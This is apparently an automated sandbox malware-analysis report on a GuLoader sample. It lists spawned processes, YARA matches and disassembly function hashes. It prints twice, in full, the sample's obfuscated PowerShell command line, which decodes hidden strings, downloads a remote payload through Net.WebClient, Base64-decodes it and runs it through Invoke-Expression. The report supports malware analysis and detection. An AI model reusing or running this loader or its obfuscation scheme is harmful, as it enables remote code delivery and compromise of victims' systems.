2e b9 2b 60 4f e3 ea 6c 6d 5a
                                                                                Data Ascii: z"]W/>J}bRWpEdta7h'q9i~<(N}6T?A6]\7X}}YF@A^t3JIyq\dC9NJ$J!9.`ekBRP#s(+5$pdp}\7?k@m:yV-2t4 6.T imWxMCc?1s.+`OlmZ


                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Target ID:0
                                                                                Start time:14:12:37
                                                                                Start date:23/05/2024
                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\kam.cmd" "
                                                                                Imagebase:0x7ff6b14d0000
                                                                                File size:289'792 bytes
                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:1
                                                                                Start time:14:12:37
                                                                                Start date:23/05/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:2
                                                                                Start time:14:12:37
                                                                                Start date:23/05/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:powershell.exe -windowstyle hidden "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cIstanaKaravlSlag. ');$Amenable=Circuted ' Unio$ Fa.rASkr,lnRetoudPottieKassefInstia IndudNap.deC,olurOverfeUncomnFlomm.ProduDRejseoSpanlw,lgtsnUdkoml T.nko ,luka HenvdSysteFSkrmdi.ortel IllaeParak(Mis,i$B gstSkilomkTricorNon haSkovraDuod.rB ntweJussim.eordmComp eGigannPh,nes Prog,Un,na$ a byDUncapu Sanks onstAfskapHrg.roTra,diHastin EpiztRefec)Adroi ';$Dustpoint=$Nonstudy[0];Udkrte (Circuted 'S.efn$UdsttgBeskyl elloAnginbStyreaRespelNonco:ScintPKomitaK bler,ontra Tricm S akySikahoPa,igcExplalNonfeo Thern.laddu BlomsRa.ad=dand.(,mbelTSt.inef,rdjs InfitGummi-CheckP SamsaExcretmandahInd,s Ubeti$DewfaDWarbluAfmytsForeltBarrip AngioC.loriFoaminResult Deej)Truss ');while (!$Paramyoclonus) {Udkrte (Circuted 'Steth$ F emgst ndl ValeoGra,sb Se.iaMemorl phea:OpirrH GashoTach.vS.rteeSvierd FounsH emma Fedel Intea Hks.tReguleFod,orSt.lt=lania$ Ageit MegerScyphu .ilbeTrout ') ;Udkrte $Amenable;Udkrte (Circuted ' PorpSRandotLimo,aZunisrB.nkrtMun.k-GypteST.anqlP efoeBactee Forhpmarku Culte4Oktan ');Udkrte (Circuted 'Adiab$ .anggSphe l soljo L.ncbWistiaSpinelS,mis:Bath PUac ea Ti srMiddaa.lassmLine,yHyperoDemobcSau,olForbroVrgelnG.dlsugenansStill=For.m(DuritT Te,neDemarsSelectLege.-AnlgsPRinjiaTraittLandih S lf A,ipo$ColliDPaxamufinansR,sentMust,p Rituo OlieiGaussnTyp gtAnthr)Alkoh ') ;Udkrte (Circuted 'Jubel$CubbygUdflelSmirkoSc,osbVocifaAsexul ,roc:Sa gsN .gndoTrternFinlasHi,lgeOpmrkvTroileSc.nsrsan,ei AccetCo.yni InsueUtjspsSocia=Edema$ BrysgHydr l S,ikoBeamab Pogoade,telSabat: VaabDBill,y,ekstr vabe Fi.drParaliPr,pogRodese LnfosNarci+ Bara+ Pric%.syls$H,droPDalmaaIdrtsrMisw,asr.espcom,yoKlejnd uldb.osteicDentaoReng.u St un Opgrt esk ') ;$Skraaremmens=$Parapod[$Nonseverities];}$Genindkalder112=320122;$Uncharge=28893;Udkrte (Circuted ' issp$Pos.kg.affel,obotoCerclb.edfra AnsglSemiy:L.jrsFT.steu RifalArbejdinde,eP,ckpnSpaltdNon,eeKuldkn Kl pdForbre Angr t kst=Echin HoundGPr,toe .alutBrneh-,ekreC downoaerugn Beg t MulleLedevn.ndeftOutdr Bi tr$ oreiD.andsumineasRe.artGardipAfstroCymogi DolenImdegtGangl ');Udkrte (Circuted 'H.ppe$depotgPolyplServooretspbChi,eaSuperlPre,c:NulstF DagliAftenrP,oteeProseoPostpgchrist O,eryOutg vPo,nse adinsTekst Pinda=B vaa Virke[Rya,bSOutp,yVegecsSwee tWe.daeOpaq m ,tom.MakinC Ec,ao RelenHalv vKar.oePtil.r WashtIndfr]Speck:Vedta: AflyFSsterrGg.ero Un,imBirtiBCarolaCombrsbldgreSc,og6Tempo4HjernSAdrestSt.phrGevini,uditnplantgBurge(nonpe$ Enr FreglouK.akslPro ldSto.ae.ullanWitnedarbejeKludenCrossdRetsbeUnder)Rose, ');Udkrte (Circuted 'Solip$SharpgMo,snlS.ottoBrutabBaggraSpa el Futi: utstEGrosgl IndfaKettipan.elhBr etuPetalrSnailu jurisEn,la1 Delb5 Te,h .ncon=Viges Aktio[ GnidS Gal,yC tassEm,nctTenoneSynecm syba..ebatTB,rdfes,nsfxGr.cetEurot.RhumbEGldsbnScarrcOver,oBesondtaxpaiUd,honTraadgSides] Vand:Sikah:AllopARee.pSRovetC ScioISorteITllel..bensGOnst.eDavietSwagbSBurr,t RegnrArmodirubrinFormegMaan.(Confi$NonetFTiltaiU taprTrinneAgroso Urvrg Kodet FrpeyBarnyv Lo,geEr.essArres)S rpe ');Udkrte (Circuted 'Fusen$Nanocg lectl.rlovoSt.llb.ivasaByplalDisha: BobbEEksekk SadlsoverwiBeshrlInv,clUrrl,eEndaddNatioe Pr,er Stil2,anta3Inbur0Tress=Udfrd$HundrEPiratlFokusa SpecpSlvfahTilkauTriasr HarpuAttessNiflh1Godfr5P.ilo.ChaetsUneffuBushwbSu,ersstegatSloverDyrekiSkruenRekomgSorti(Vindh$ BortGunruseNomadnReadmiUnme nPlatid S.amkBordea.spirlSer edKnytte Stilr Stil1Mammi1Valgm2 Blep, N.dd$ AnalUMammanPudiac sarch Fo.saAbiosr RetsgT.uemeWaist)Lung. ');Udkrte $Eksilleder230;"
                                                                                Imagebase:0x7ff7be880000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2581460938.000002506881F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:3
                                                                                Start time:14:12:37
                                                                                Start date:23/05/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:5
                                                                                Start time:14:12:40
                                                                                Start date:23/05/2024
                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t"
                                                                                Imagebase:0x7ff6b14d0000
                                                                                File size:289'792 bytes
                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:6
                                                                                Start time:14:12:49
                                                                                Start date:23/05/2024
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cIstanaKaravlSlag. ');$Amenable=Circuted ' Unio$ Fa.rASkr,lnRetoudPottieKassefInstia IndudNap.deC,olurOverfeUncomnFlomm.ProduDRejseoSpanlw,lgtsnUdkoml T.nko ,luka HenvdSysteFSkrmdi.ortel IllaeParak(Mis,i$B gstSkilomkTricorNon haSkovraDuod.rB ntweJussim.eordmComp eGigannPh,nes Prog,Un,na$ a byDUncapu Sanks onstAfskapHrg.roTra,diHastin EpiztRefec)Adroi ';$Dustpoint=$Nonstudy[0];Udkrte (Circuted 'S.efn$UdsttgBeskyl elloAnginbStyreaRespelNonco:ScintPKomitaK bler,ontra Tricm S akySikahoPa,igcExplalNonfeo Thern.laddu BlomsRa.ad=dand.(,mbelTSt.inef,rdjs InfitGummi-CheckP SamsaExcretmandahInd,s Ubeti$DewfaDWarbluAfmytsForeltBarrip AngioC.loriFoaminResult Deej)Truss ');while (!$Paramyoclonus) {Udkrte (Circuted 'Steth$ F emgst ndl ValeoGra,sb Se.iaMemorl phea:OpirrH GashoTach.vS.rteeSvierd FounsH emma Fedel Intea Hks.tReguleFod,orSt.lt=lania$ Ageit MegerScyphu .ilbeTrout ') ;Udkrte $Amenable;Udkrte (Circuted ' PorpSRandotLimo,aZunisrB.nkrtMun.k-GypteST.anqlP efoeBactee Forhpmarku Culte4Oktan ');Udkrte (Circuted 'Adiab$ .anggSphe l soljo L.ncbWistiaSpinelS,mis:Bath PUac ea Ti srMiddaa.lassmLine,yHyperoDemobcSau,olForbroVrgelnG.dlsugenansStill=For.m(DuritT Te,neDemarsSelectLege.-AnlgsPRinjiaTraittLandih S lf A,ipo$ColliDPaxamufinansR,sentMust,p Rituo OlieiGaussnTyp gtAnthr)Alkoh ') ;Udkrte (Circuted 'Jubel$CubbygUdflelSmirkoSc,osbVocifaAsexul ,roc:Sa gsN .gndoTrternFinlasHi,lgeOpmrkvTroileSc.nsrsan,ei AccetCo.yni InsueUtjspsSocia=Edema$ BrysgHydr l S,ikoBeamab Pogoade,telSabat: VaabDBill,y,ekstr vabe Fi.drParaliPr,pogRodese LnfosNarci+ Bara+ Pric%.syls$H,droPDalmaaIdrtsrMisw,asr.espcom,yoKlejnd uldb.osteicDentaoReng.u St un Opgrt esk ') ;$Skraaremmens=$Parapod[$Nonseverities];}$Genindkalder112=320122;$Uncharge=28893;Udkrte (Circuted ' issp$Pos.kg.affel,obotoCerclb.edfra AnsglSemiy:L.jrsFT.steu RifalArbejdinde,eP,ckpnSpaltdNon,eeKuldkn Kl pdForbre Angr t kst=Echin HoundGPr,toe .alutBrneh-,ekreC downoaerugn Beg t MulleLedevn.ndeftOutdr Bi tr$ oreiD.andsumineasRe.artGardipAfstroCymogi DolenImdegtGangl ');Udkrte (Circuted 'H.ppe$depotgPolyplServooretspbChi,eaSuperlPre,c:NulstF DagliAftenrP,oteeProseoPostpgchrist O,eryOutg vPo,nse adinsTekst Pinda=B vaa Virke[Rya,bSOutp,yVegecsSwee tWe.daeOpaq m ,tom.MakinC Ec,ao RelenHalv vKar.oePtil.r WashtIndfr]Speck:Vedta: AflyFSsterrGg.ero Un,imBirtiBCarolaCombrsbldgreSc,og6Tempo4HjernSAdrestSt.phrGevini,uditnplantgBurge(nonpe$ Enr FreglouK.akslPro ldSto.ae.ullanWitnedarbejeKludenCrossdRetsbeUnder)Rose, ');Udkrte (Circuted 'Solip$SharpgMo,snlS.ottoBrutabBaggraSpa el Futi: utstEGrosgl IndfaKettipan.elhBr etuPetalrSnailu jurisEn,la1 Delb5 Te,h .ncon=Viges Aktio[ GnidS Gal,yC tassEm,nctTenoneSynecm syba..ebatTB,rdfes,nsfxGr.cetEurot.RhumbEGldsbnScarrcOver,oBesondtaxpaiUd,honTraadgSides] Vand:Sikah:AllopARee.pSRovetC ScioISorteITllel..bensGOnst.eDavietSwagbSBurr,t RegnrArmodirubrinFormegMaan.(Confi$NonetFTiltaiU taprTrinneAgroso Urvrg Kodet FrpeyBarnyv Lo,geEr.essArres)S rpe ');Udkrte (Circuted 'Fusen$Nanocg lectl.rlovoSt.llb.ivasaByplalDisha: BobbEEksekk SadlsoverwiBeshrlInv,clUrrl,eEndaddNatioe Pr,er Stil2,anta3Inbur0Tress=Udfrd$HundrEPiratlFokusa SpecpSlvfahTilkauTriasr HarpuAttessNiflh1Godfr5P.ilo.ChaetsUneffuBushwbSu,ersstegatSloverDyrekiSkruenRekomgSorti(Vindh$ BortGunruseNomadnReadmiUnme nPlatid S.amkBordea.spirlSer edKnytte Stilr Stil1Mammi1Valgm2 Blep, N.dd$ AnalUMammanPudiac sarch Fo.saAbiosr RetsgT.uemeWaist)Lung. ');Udkrte $Eksilleder230;"
                                                                                Imagebase:0x200000
                                                                                File size:433'152 bytes
                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2409553300.00000000074A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2407208321.00000000061C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2418645721.000000000966A000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:7
                                                                                Start time:14:12:51
                                                                                Start date:23/05/2024
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t"
                                                                                Imagebase:0x790000
                                                                                File size:236'544 bytes
                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:9
                                                                                Start time:14:13:06
                                                                                Start date:23/05/2024
                                                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                                Imagebase:0x5a0000
                                                                                File size:516'608 bytes
                                                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Executed Functions

                                                                                  Function 00007FF848F1AB16 Relevance: .5, Instructions: 472COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2599908602.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 29566466c4af069494614804e921394a32bf39fbdc339e16b5a8e35b0669f154
                                                                                  • Instruction ID: 40e8535fda9a2ea5e302207f25dbbbc0d01320858ffa726113a63ee84c5802c1
                                                                                  • Opcode Fuzzy Hash: 29566466c4af069494614804e921394a32bf39fbdc339e16b5a8e35b0669f154
                                                                                  • Instruction Fuzzy Hash: 99F1913091CA8D8FEBA8EF28C8557E937E1FF54350F04426AE84DC72D5DB3899858B85
                                                                                  Function 00007FF848F1B8C2 Relevance: .5, Instructions: 458COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2599908602.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bd9cdcce5c6524b19cf0955f6922ca9396d2a53624fb0c9268e8270971ad5392
                                                                                  • Instruction ID: 3629aa4eaac2e85ba8be8700685a652fc0064ba4e2067e50a3a2b3a11e478ebf
                                                                                  • Opcode Fuzzy Hash: bd9cdcce5c6524b19cf0955f6922ca9396d2a53624fb0c9268e8270971ad5392
                                                                                  • Instruction Fuzzy Hash: D3E1B130A1CA4D8FEBA8EF28C8557E977E1FB54350F14426EE84DC7295CF78A8458B81
                                                                                  Function 00007FF848FE4049 Relevance: .6, Instructions: 650COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2600722223.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1167cc16856d9c3f952f786fc73d41ba5f04ef044daece010799d2367dbdde50
                                                                                  • Instruction ID: 4306c538753bce10e363e5594ea5f936bde10891ecb3419f4dacaa592e4d9d20
                                                                                  • Opcode Fuzzy Hash: 1167cc16856d9c3f952f786fc73d41ba5f04ef044daece010799d2367dbdde50
                                                                                  • Instruction Fuzzy Hash: 4D121431D1EECA4FE756EB2858652B57BE1EF662A0F0801FED049C71D3DB1CA8068356
                                                                                  Function 00007FF848FE522D Relevance: .4, Instructions: 407COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2600722223.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2d337f55bd2a679bf2309a263f2916963ca299e61e813068f667d3c174998fba
                                                                                  • Instruction ID: 706de69da044cff6477e2620df48eaec49d675a73e82dd531a390a465f4dc966
                                                                                  • Opcode Fuzzy Hash: 2d337f55bd2a679bf2309a263f2916963ca299e61e813068f667d3c174998fba
                                                                                  • Instruction Fuzzy Hash: 11C12471E0EA8A4FE795EB2858256B97BE1EF5A2A0F4801FBC04DC71D3DE1CB8018355
                                                                                  Function 00007FF848F1C020 Relevance: .3, Instructions: 273COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2599908602.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0ad9af4a188a9ab77ca1e037329adac9c7823d1e7dee10c228b60ab2ef62342e
                                                                                  • Instruction ID: 220aa7d8b41198995d8874897ecb6218aee16e36c035562e59cf1d2ec075224e
                                                                                  • Opcode Fuzzy Hash: 0ad9af4a188a9ab77ca1e037329adac9c7823d1e7dee10c228b60ab2ef62342e
                                                                                  • Instruction Fuzzy Hash: 63812730A1CA494FE788EB1CC495AB5B7E1FF99391F1005BDD08AC32A6EB25EC46C745
                                                                                  Function 00007FF848FE41E7 Relevance: .2, Instructions: 150COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2600722223.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ed7d1e28f700ce0b13dada853a066841b30e6c516a6df7c148e7954e62368a7e
                                                                                  • Instruction ID: 95d352c9a09b5dd5aac01bc0e736b8a0bb2cf58a2c87fe22f53e71ba66f16153
                                                                                  • Opcode Fuzzy Hash: ed7d1e28f700ce0b13dada853a066841b30e6c516a6df7c148e7954e62368a7e
                                                                                  • Instruction Fuzzy Hash: 5A41DF31D1EE8A4FF795EB2858652B96AE1FF653A0F5800BED00CC71D2DE1CA840835A
                                                                                  Function 00007FF848FE5352 Relevance: .1, Instructions: 108COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2600722223.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d63afd334a41556fe7e08610c861da89389d725c10b809ead7bf55f9b6179342
